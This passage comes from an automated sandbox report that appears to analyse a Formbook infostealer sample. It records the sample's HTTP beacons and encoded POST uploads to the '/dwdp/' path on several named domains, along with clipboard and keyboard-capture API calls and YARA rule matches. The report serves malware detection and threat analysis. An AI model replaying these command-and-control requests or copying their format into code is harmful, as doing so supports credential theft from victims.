4c 4d 69 72 57 71 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: THg8gZ=AUIDtdOn(FTw2GHIa8r0pWx0QznXfGLX0a6LbfWi~8Q-x6oet97Nv6gtoSSBM5t-PxhBR-0mTuL8kgBJAb09TW9uNn3mxC8WLtFi17QzIlRcVDiiecdNGXhAqXhNcOIpLLg2xiy3kqV33Iy56MXQtRQNo50xaXNCTyGkx1t_0MALMirWqg).
          Source: global trafficHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.t4yfrance.comConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.t4yfrance.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.t4yfrance.com/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 41 55 49 44 74 64 4f 6e 28 46 54 77 77 6d 58 49 59 66 44 30 72 32 78 33 56 7a 6e 58 52 6d 4c 54 30 61 7e 4c 62 65 44 5f 35 4a 41 2d 78 4a 51 65 74 62 48 4e 70 36 67 74 28 69 54 47 49 35 74 73 50 77 45 36 52 36 77 51 54 73 6e 38 69 6d 4e 4a 57 4c 30 36 4d 6d 39 56 4d 6e 33 6c 38 69 38 57 4c 73 35 45 31 35 35 4d 49 6b 70 63 56 32 75 69 65 5a 70 4f 4a 6e 68 42 31 48 68 4e 63 4f 55 32 4c 4c 68 42 78 6a 61 6e 6b 71 31 33 32 61 36 35 35 64 58 54 37 78 51 4b 33 4a 31 78 66 56 41 30 66 78 79 76 35 6d 78 79 31 37 78 75 41 43 43 6a 30 4d 76 55 51 6e 4f 39 48 48 52 6e 5a 31 46 38 42 4d 52 6b 52 68 50 30 64 52 4f 70 73 30 47 43 5a 6a 68 4c 48 4e 51 32 54 71 77 77 62 32 7e 49 58 70 37 43 63 32 4b 55 44 58 41 6c 70 45 55 32 45 47 78 49 75 53 74 32 73 31 39 36 6a 77 28 6c 34 48 57 49 57 7a 4f 72 74 6a 74 62 49 59 79 5a 6e 45 63 51 65 4f 6d 36 54 6b 32 44 37 44 48 69 63 31 41 55 4e 54 45 36 6f 7a 49 79 63 61 4f 42 67 59 42 7a 32 46 65 63 44 4e 75 46 37 58 6a 6e 79 76 4a 53 6b 38 63 54 71 76 68 58 4d 6e 30 6e 6b 4e 79 30 4e 6b 42 50 50 4d 32 69 56 76 73 65 6f 6c 72 42 70 72 32 61 59 4a 53 42 42 45 45 6e 59 64 78 51 49 49 42 5f 64 72 59 47 75 70 36 67 34 36 32 5a 72 75 55 76 64 65 53 63 71 35 28 6d 69 4c 41 6b 41 6f 34 76 37 4b 4f 4f 37 31 44 6a 6e 73 46 56 4f 53 6b 34 35 43 6d 30 4a 7a 4e 31 28 7a 49 6a 31 69 35 33 52 43 51 33 68 5a 30 2d 64 78 72 51 28 73 35 4e 6f 77 7a 79 56 4d 49 32 4a 46 62 53 4d 6c 77 36 49 65 47 57 55 2d 6a 41 61 65 4c 75 6c 35 5a 65 6d 56 73 53 59 6f 6f 67 59 38 7a 51 45 6b 6c 42 32 43 71 6b 38 35 71 61 6d 72 
4f 63 6c 4d 77 54 73 68 58 32 68 48 6c 6b 43 63 6d 77 53 51 6c 74 4e 36 6a 6b 7e 68 36 35 37 77 62 36 53 73 73 43 28 66 35 50 43 61 57 79 46 51 4d 6a 39 49 73 78 4c 4a 68 36 47 55 37 5a 52 59 73 4b 74 35 51 55 45 54 64 77 6a 35 44 44 39 70 73 4b 35 6d 69 50 6a 6f 7a 49 38 54 59 59 64 70 49 71 31 46 76 56 61 39 30 6a 68 6d 37 74 79 52 28 62 36 75 6c 49 62 39 54 76 44 36 39 30 30 45 6b 70 43 6a 73 53 44 73 57 78 49 78 66 34 30 58 63 4f 4d 61 5a 73 6a 79 61 4b 37 50 7e 6f 6e 72 53 6b 6d 43 78 43 6c 46 56 68 39 33 39 55 51 42 4a 4f 4f 72 41 57 51 65 79 6f 43 38 5a 41 28 79 6d 39 53 35 53 47 56 38 78 33 62 48 46 59 62 44 6c 39 4e 58 47 49 38 6c 4a 4a 76 5a 50 47 79 52 7e 4f 65 35 52 49 37 50 43 42 45 30 68 43 41 4e 45 7a 75 72 38 57 36 4f 63 39 49 59 65 36 71 57 44 75 6e 49 32 73 56 43 68 32 71 75 31 34 74 6f 7a 57 51 59 39 33 39 70 56 71 57 35 48 56 4f 41 58 33 61 44 4d 54 64 30 6d 65 30 4f 68 6b 61 76 7e 56 32 44 4b 35 6d 58 6d 45 38 50 58 63 76 4b 7a 6c 32 6a 65 52 73 55 71 76 47 51 49 6d 42 65 33 65 69 58 44 65 34 66 4
          Source: global trafficHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.a8-group.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.a8-group.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.a8-group.com/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 4f 51 7a 71 33 76 46 44 65 68 4e 39 6a 2d 65 35 67 6d 31 5a 57 71 6d 51 76 67 77 48 4e 35 53 67 62 6b 38 7a 44 41 48 50 37 54 6d 74 35 74 49 5a 79 56 4d 6e 64 73 46 5f 68 68 67 76 6f 70 6e 39 7e 64 54 4c 4d 30 79 78 6b 55 33 6a 51 4d 57 75 50 41 70 55 54 4e 64 4e 47 64 51 48 48 74 49 4a 73 56 76 4d 4b 34 73 71 34 5a 38 71 28 76 56 72 4c 36 53 31 31 47 53 43 58 44 77 33 50 30 55 61 39 36 37 57 47 65 4d 38 28 43 72 44 47 4e 57 50 36 37 56 5f 71 73 4f 47 32 37 4c 6f 6b 73 67 32 4b 70 45 47 47 48 4c 71 41 72 75 48 47 45 38 42 47 51 64 4c 7e 51 35 56 75 7a 6b 76 66 65 59 49 35 4f 65 6d 5a 46 42 38 71 4b 48 64 4b 53 4f 32 58 73 28 41 50 38 70 4b 44 42 62 62 58 65 4a 55 34 55 6f 62 4f 57 34 32 53 44 51 4f 57 57 4b 5f 51 5a 34 49 73 35 56 5f 69 33 75 58 45 4e 59 35 57 76 68 4f 32 41 6c 47 78 67 69 58 4f 58 4a 54 63 6a 47 79 28 79 6e 5a 36 44 49 43 51 78 63 6c 48 45 58 64 50 6b 6a 73 4b 61 6a 5a 59 78 63 74 32 4e 71 61 44 77 6f 58 45 47 4f 68 61 43 46 6c 39 4a 59 37 7a 70 38 53 33 7a 28 53 78 33 6f 5a 44 6d 28 33 77 30 28 6d 79 44 73 65 6e 65 66 58 63 66 28 65 73 6e 5a 50 6a 33 58 49 39 51 32 6e 61 42 43 39 53 4f 66 65 76 38 32 31 6f 72 6d 72 76 33 4d 35 28 70 46 58 5a 4d 51 48 79 58 6b 36 62 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
THg8gZ=OQzq3vFDehN9j-e5gm1ZWqmQvgwHN5Sgbk8zDAHP7Tmt5tIZyVMndsF_hhgvopn9~dTLM0yxkU3jQMWuPApUTNdNGdQHHtIJsVvMK4sq4Z8q(vVrL6S11GSCXDw3P0Ua967WGeM8(CrDGNWP67V_qsOG27Loksg2KpEGGHLqAruHGE8BGQdL~Q5VuzkvfeYI5OemZFB8qKHdKSO2Xs(AP8pKDBbbXeJU4UobOW42SDQOWWK_QZ4Is5V_i3uXENY5WvhO2AlGxgiXOXJTcjGy(ynZ6DICQxclHEXdPkjsKajZYxct2NqaDwoXEGOhaCFl9JY7zp8S3z(Sx3oZDm(3w0(myDsenefXcf(esnZPj3XI9Q2naBC9SOfev821ormrv3M5(pFXZMQHyXk6bQ).
          Source: global trafficHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.a8-group.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.a8-group.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.a8-group.com/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 4f 51 7a 71 33 76 46 44 65 68 4e 39 28 66 65 35 6a 52 68 5a 43 36 6d 51 6b 41 77 46 4e 35 53 6a 62 6b 39 36 44 42 44 66 37 67 47 74 34 5f 41 5a 78 6e 55 6e 61 73 46 38 6d 52 68 6b 6d 4a 6e 6f 7e 64 53 67 4d 78 53 78 6b 56 54 6a 51 4a 71 75 50 54 78 58 51 4e 64 50 41 64 52 52 4d 4e 49 51 73 56 79 56 4b 38 38 71 34 61 55 71 7e 65 56 72 46 4d 47 32 69 57 53 48 62 6a 77 38 64 30 55 57 39 36 37 6f 47 65 4d 61 28 41 44 44 47 39 47 50 35 59 39 34 68 73 4f 35 36 62 4b 4a 30 73 64 66 66 70 51 75 4c 55 72 36 48 75 50 6b 46 41 78 65 57 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: THg8gZ=OQzq3vFDehN9(fe5jRhZC6mQkAwFN5Sjbk96DBDf7gGt4_AZxnUnasF8mRhkmJno~dSgMxSxkVTjQJquPTxXQNdPAdRRMNIQsVyVK88q4aUq~eVrFMG2iWSHbjw8d0UW967oGeMa(ADDG9GP5Y94hsO56bKJ0sdffpQuLUr6HuPkFAxeWA).
          Source: global trafficHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.a8-group.comConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.a8-group.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.a8-group.com/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 01:22:22 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 77 64 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dwdp/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 01:22:28 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 77 64 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dwdp/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 01:22:30 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 77 64 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dwdp/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 01:22:32 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 77 64 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dwdp/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 01:22:34 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 77 64 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dwdp/ was not found on this server.</p></body></html>
          Source: PrWP76ejHO.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: PrWP76ejHO.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: 1x6VE38oK.22.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 1x6VE38oK.22.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: 1x6VE38oK.22.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 1x6VE38oK.22.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: ipconfig.exe, 00000016.00000002.512572827.00000000037FA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.t4yfrance.com/dwdp/?DDK8=DL0dq8Xp&THg8gZ=NWgjuoil9S/
          Source: ipconfig.exe, 00000016.00000002.512572827.00000000037FA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.t4yfrance.com/dwdp/?DDK8=DL0dq8Xp&amp;THg8gZ=NWgjuoil9S/
          Source: unknownHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.fedefarmatour.onlineConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.fedefarmatour.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.fedefarmatour.online/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 6c 5f 56 79 41 4a 4b 57 6d 35 4a 64 6a 61 6d 7a 5a 34 63 63 52 76 46 56 28 51 77 74 64 72 38 62 74 55 71 38 50 61 76 72 4e 66 75 47 49 61 46 64 33 57 62 35 78 6b 56 50 43 53 4e 4c 31 44 36 73 74 55 4a 38 68 71 4d 53 49 61 64 66 7a 63 61 62 6a 45 59 34 4f 38 56 5a 36 6f 65 77 61 57 46 63 4d 31 6b 41 4f 33 78 6d 63 5f 67 6a 4d 38 77 66 77 6e 32 6e 6b 46 6f 4a 4d 51 43 49 39 71 36 4a 48 67 51 38 7e 50 61 6e 72 33 43 63 35 41 30 77 67 77 7e 47 64 79 79 71 73 73 62 4d 30 67 75 38 41 6b 34 2d 53 6c 4c 5f 7a 67 6b 4e 77 38 65 5f 4c 42 78 4c 4e 37 6c 32 66 63 6f 59 37 41 38 65 7e 7a 34 44 59 4c 69 33 67 4f 32 74 4a 66 4b 73 5a 4e 7a 46 4b 63 36 67 53 6a 30 6a 42 38 31 47 48 36 58 58 4c 48 53 51 74 6e 64 54 38 48 53 6c 70 67 5a 42 31 34 66 2d 56 55 67 49 35 5a 48 71 77 48 6d 61 4f 57 32 41 45 4c 34 6b 49 76 4f 6e 69 48 72 51 32 74 77 6a 4a 6f 5a 76 5a 4d 76 48 67 6f 61 69 54 59 67 65 7e 70 28 53 43 4e 33 74 35 30 69 45 52 77 49 6b 78 4a 55 66 28 6c 4a 5a 38 57 28 79 36 2d 7a 51 38 31 36 41 50 66 52 7a 42 69 49 34 69 68 51 67 39 66 76 79 79 76 56 6d 6b 4c 76 32 73 74 71 37 53 64 37 32 28 77 28 30 5a 6e 53 6e 5a 76 6f 4e 64 79 74 75 6b 47 4f 45 64 63 51 34 55 46 39 37 57 4f 6e 71 77 71 4e 73 42 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
THg8gZ=l_VyAJKWm5JdjamzZ4ccRvFV(Qwtdr8btUq8PavrNfuGIaFd3Wb5xkVPCSNL1D6stUJ8hqMSIadfzcabjEY4O8VZ6oewaWFcM1kAO3xmc_gjM8wfwn2nkFoJMQCI9q6JHgQ8~Panr3Cc5A0wgw~GdyyqssbM0gu8Ak4-SlL_zgkNw8e_LBxLN7l2fcoY7A8e~z4DYLi3gO2tJfKsZNzFKc6gSj0jB81GH6XXLHSQtndT8HSlpgZB14f-VUgI5ZHqwHmaOW2AEL4kIvOniHrQ2twjJoZvZMvHgoaiTYge~p(SCN3t50iERwIkxJUf(lJZ8W(y6-zQ816APfRzBiI4ihQg9fvyyvVmkLv2stq7Sd72(w(0ZnSnZvoNdytukGOEdcQ4UF97WOnqwqNsBA).
          Source: unknownDNS traffic detected: queries for: www.inhomeyoga.com
          Source: global trafficHTTP traffic detected: GET /dwdp/?DDK8=DL0dq8Xp&THg8gZ=as8dBOCYMIlGkdFtu6bNi6R+poUd8qernbVKNux/Lg6XWSTTcIv/9iufEycx+V+hXMP21oAGdeFqW0RuMIySji5bX/9mKLXNqQ== HTTP/1.1Host: www.inhomeyoga.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dwdp/?THg8gZ=o99SD4CnjZ1qu7iTZtFfc7Nx3UYgSJ0Ur2vCMIrwN9S0TIs4+nDL6lw5CChyhzqrvnlUg4IJDbpF+LHriFN/RsV5sIy/QX8aQA==&DDK8=DL0dq8Xp HTTP/1.1Host: www.fedefarmatour.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dwdp/?DDK8=DL0dq8Xp&THg8gZ=NWgjuoil9S/+22DuNJW9gHFfRnzyfGvnsPD5fu3f3YQDroVAltOshqAP1UOAIJ0eSwU/Ico7U9Xz8hxCOYRKQwl8NX3l5SYpCA== HTTP/1.1Host: www.t4yfrance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dwdp/?THg8gZ=DSbK0Z5FDwQug92xqW96a+2ughsfKsmWbm0zJjXp1SGH3e562FU2SdtvukdrkYmM3MO1KHWCknXXR+yfUTM1LtpOX41OHf8llQ==&DDK8=DL0dq8Xp HTTP/1.1Host: www.a8-group.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_004050C0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard,
          Source: PrWP76ejHO.exe, 00000000.00000002.254662988.000000000080A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_00404020 GetKeyboardState,
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          Source: Yara matchFile source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
